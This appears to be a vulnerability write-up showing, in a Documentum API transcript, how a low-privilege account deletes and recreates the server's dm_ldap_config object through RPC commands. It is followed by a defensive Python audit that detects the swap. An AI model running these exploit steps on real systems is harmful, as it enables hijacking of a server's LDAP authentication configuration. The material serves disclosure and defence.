Is it possible to compromise Documentum by deleting object? Solution

The solution relies on the fact that Content Server fails to properly maintain references between objects. For example, an attacker is able to delete the existing dm_ldap_config object and create his own:

--
-- configuring dm_ldap_config and dm_server_config
-- under superuser account
--
API> create,c,dm_ldap_config
...
0801ffd7805ca7ff
API> save,c,l
...
OK
API> retrieve,c,dm_server_config
...
3d01ffd780000102
API> set,c,l,ldap_config_id
SET> 0801ffd7805ca7ff
...
OK
API> save,c,l
...
OK
API> connect,ssc_dev,test01,test01
...
s1
--
-- attacker is unable to modify dm_ldap_config object
--
API> destroy,c,0801ffd7805ca7ff
...
[DM_SYSOBJECT_E_NO_DELETE_ACCESS]error:  
    "No delete access for sysobject named ''"

API> save,c,0801ffd7805ca7ff
...
[DM_SYSOBJECT_E_NO_WRITE_ACCESS]error:  
    "No write access for sysobject named ''."


API> get,c,0801ffd7805ca7ff,i_vstamp
...
0
--
-- but attacker is able to delete dm_ldap_config object
-- using dmDisplayConfigExpunge RPC command
--
API> apply,c,0801ffd7805ca7ff,dmDisplayConfigExpunge,
       OBJECT_TYPE,S,dm_ldap_config,i_vstamp,I,0
...
q0
API> next,c,q0
...
OK
API> dump,c,q0
...
USER ATTRIBUTES

  result                          : T

SYSTEM ATTRIBUTES


APPLICATION ATTRIBUTES


INTERNAL ATTRIBUTES


API> close,c,q0
...
OK
--
-- dm_ldap_config object got deleted
--
API> revert,c,0801ffd7805ca7ff
...
[DM_API_E_EXIST]error:  
  "Document/object specified by 0801ffd7805ca7ff does not exist."

[DM_SYSOBJECT_E_CANT_FETCH_INVALID_ID]error:  
   "Cannot fetch a sysobject - Invalid object ID : 0801ffd7805ca7ff"

[DM_API_E_EXIST]error:  
   "Document/object specified by 0801ffd7805ca7ff does not exist."

[DM_SYSOBJECT_E_CANT_FETCH_INVALID_ID]error:  
   "Cannot fetch a sysobject - Invalid object ID : 0801ffd7805ca7ff"

[DM_OBJ_MGR_E_FETCH_FAIL]error:  
   "attempt to fetch object with handle 0801ffd7805ca7ff failed"

--
-- now attacker creates his own dm_ldap_config object
--
API> apply,c,0801ffd7805ca7ff,SysObjSave,
       OBJECT_TYPE,S,dm_ldap_config,
       IS_NEW_OBJECT,B,T,
       i_vstamp,I,0,
       object_name,S,malicious,
       i_has_folder,B,T,
       r_object_type,S,dm_ldap_config,
       owner_name,S,test01,
       owner_permit,I,7
...
q0
API> next,c,q0
...
OK
API> dump,c,q0
...
USER ATTRIBUTES

  result                          : 1

SYSTEM ATTRIBUTES


APPLICATION ATTRIBUTES


INTERNAL ATTRIBUTES


API> revert,c,0801ffd7805ca7ff
...
OK
API> dump,c,0801ffd7805ca7ff
...
USER ATTRIBUTES

  object_name                     : malicious
  title                           :
  subject                         :

API> save,c,0801ffd7805ca7ff
...
OK
--
-- now dm_server_config references the
-- malicious dm_ldap_config object
--
API> revert,c,3d01ffd780000102
...
OK
API> get,c,l,ldap_config_id
...
0801ffd7805ca7ff
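
A defender-side check for the condition shown above, as an added example that is not part of the original post: the recreated object keeps the same ID, so comparing ldap_config_id alone shows nothing, and the audit instead compares the referenced object's attributes against a known-good baseline. The owner name dmadmin, the TRUSTED_OWNERS set and the snapshot dictionaries are constructed assumptions; reading the attributes from the repository is outside the example.

```python
# Constructed baseline, recorded while the repository was in a known-good state.
# "dmadmin" is an assumed superuser name; the object IDs are those in the transcript.
BASELINE = {
    "3d01ffd780000102": {                        # dm_server_config
        "ldap_config_id": {
            "r_object_id": "0801ffd7805ca7ff",
            "r_object_type": "dm_ldap_config",
            "owner_name": "dmadmin",
            "object_name": "",
        }
    }
}
TRUSTED_OWNERS = {"dmadmin"}   # assumption: accounts allowed to own config objects


def audit(referrers: dict, objects: dict) -> list:
    """referrers: {referrer_id: {attr: referenced_id}} as read today.
    objects: {object_id: attributes} as read today; a missing key means not found.
    Returns a list of (referrer_id, attr, finding) tuples."""
    findings = []
    for ref_id, attrs in BASELINE.items():
        for attr, expected in attrs.items():
            target_id = referrers.get(ref_id, {}).get(attr)
            if target_id != expected["r_object_id"]:
                findings.append((ref_id, attr, "reference changed"))
                continue
            obj = objects.get(target_id)
            if obj is None:                      # state after the expunge
                findings.append((ref_id, attr, "dangling reference"))
                continue
            if obj.get("owner_name") not in TRUSTED_OWNERS:
                findings.append((ref_id, attr, "untrusted owner"))
            changed = [k for k in ("r_object_type", "owner_name", "object_name")
                       if obj.get(k) != expected[k]]
            if changed:                          # same ID, different object
                findings.append((ref_id, attr, "replaced: " + ",".join(changed)))
    return findings


# Constructed snapshots of the three states the transcript walks through.
REFS = {"3d01ffd780000102": {"ldap_config_id": "0801ffd7805ca7ff"}}
CLEAN = {"0801ffd7805ca7ff": {"r_object_type": "dm_ldap_config",
                              "owner_name": "dmadmin", "object_name": ""}}
EXPUNGED = {}
RECREATED = {"0801ffd7805ca7ff": {"r_object_type": "dm_ldap_config",
                                  "owner_name": "test01", "object_name": "malicious"}}

if __name__ == "__main__":
    for name, snap in (("clean", CLEAN), ("expunged", EXPUNGED), ("recreated", RECREATED)):
        print(name, audit(REFS, snap))
```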
